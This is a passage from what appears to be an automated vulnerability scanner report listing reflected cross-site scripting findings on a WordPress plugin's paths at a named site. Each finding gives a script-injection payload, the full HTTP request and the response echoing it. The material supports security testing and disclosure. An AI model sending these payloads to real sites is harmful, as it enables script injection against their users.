User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674575+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/plugin-data/superslidera0d53\"><script>alert(1)</script>fd42f611c98/ssShow/lightbox/lightbox.css" />
...[SNIP]...

4.266. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eca9c"><script>alert(1)</script>1f4a2f0771d was submitted in the REST URL parameter 7. This input was echoed as eca9c\"><script>alert(1)</script>1f4a2f0771d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShoweca9c"><script>alert(1)</script>1f4a2f0771d/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShoweca9c\"><script>alert(1)</script>1f4a2f0771d/lightbox/lightbox.css" />
...[SNIP]...

4.267. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367d7"><script>alert(1)</script>a6f2c5f9e26 was submitted in the REST URL parameter 8. This input was echoed as 367d7\"><script>alert(1)</script>a6f2c5f9e26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox367d7"><script>alert(1)</script>a6f2c5f9e26/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674579+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox367d7\"><script>alert(1)</script>a6f2c5f9e26/lightbox.css" />
...[SNIP]...

4.268. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e566"><script>alert(1)</script>d02d1ba07b1 was submitted in the REST URL parameter 9. This input was echoed as 1e566\"><script>alert(1)</script>d02d1ba07b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css1e566"><script>alert(1)</script>d02d1ba07b1 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674582; expires=Thu, 02-Feb-2012 19:23:02 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css1e566\"><script>alert(1)</script>d02d1ba07b1" />
...[SNIP]...

4.269. http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d8eb"><script>alert(1)</script>9e15b3b1081 was submitted in the REST URL parameter 1. This input was echoed as 1d8eb\"><script>alert(1)</script>9e15b3b1081 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site1d8eb"><script>alert(1)</script>9e15b3b1081/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site1d8eb\"><script>alert(1)</script>9e15b3b1081/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css" />
...[SNIP]...

4.270. http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a721"><script>alert(1)</script>4e05a494985 was submitted in the REST URL parameter 2. This input was echoed as 3a721\"><script>alert(1)</script>4e05a494985 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content3a721"><script>alert(1)</script>4e05a494985/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674544+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content3a721\"><script>alert(1)</script>4e05a494985/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css" />
...[SNIP]...

4.271. http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24702"><script>alert(1)</script>57503f72f04 was submitted in the REST URL parameter 3. This input was echoed as 24702\"><script>alert(1)</script>57503f72f04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins24702"><script>alert(1)</script>57503f72f04/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins24702\"><script>alert(1)</script>57503f72f04/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css" />
...[SNIP]...

4.272. http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c140b"><script>alert(1)</script>1f6a60dc002 was submitted in the REST URL parameter 4. This input was echoed as c140b\"><script>alert(1)</script>1f6a60dc002 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-slimboxc140b"><script>alert(1)</script>1f6a60dc002/plugin-data/superslider/ssSlimbox/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:27 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-slimboxc140b\"><script>alert(1)</script>1f6a60dc002/plugin-data/superslider/ssSlimbox/default/default.css" />
...[SNIP]...

4.273. http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7c08"><script>alert(1)</script>ae9dcdd351a was submitted in the REST URL parameter 5. This input was echoed as d7c08\"><script>alert(1)</script>ae9dcdd351a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-slimbox/plugin-datad7c08"><script>alert(1)</script>ae9dcdd351a/superslider/ssSlimbox/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674549+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674549; expires=Thu, 02-Feb-2012 19:22:29 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-slimbox/plugin-datad7c08\"><script>alert(1)</script>ae9dcdd351a/superslider/ssSlimbox/default/default.css" />
...[SNIP]...

4.274. http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4ae"><script>alert(1)</script>c312e4104fa was submitted in the REST URL parameter 6. This input was echoed as 7c4ae\"><script>alert(1)</script>c312e4104fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-slimbox/plugin-data/superslider7c4ae"><script>alert(1)</script>c312e4104fa/ssSlimbox/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674551+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider7c4ae\"><script>alert(1)</script>c312e4104fa/ssSlimbox/default/default.css" />
...[SNIP]...

4.275. http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3335"><script>alert(1)</script>80926a060b5 was submitted in the REST URL parameter 7. This input was echoed as c3335\"><script>alert(1)</script>80926a060b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimboxc3335"><script>alert(1)</script>80926a060b5/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674553+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimboxc3335\"><script>alert(1)</script>80926a060b5/default/default.css" />
...[SNIP]...

4.276. http://wp-superslider.com/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eca7"><script>alert(1)</script>5a311d7dae7 was submitted in the REST URL parameter 8. This input was echoed as 9eca7\"><script>alert(1)</script>5a311d7dae7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default9eca7"><script>alert(1)</script>5a311d7dae7/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:35 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
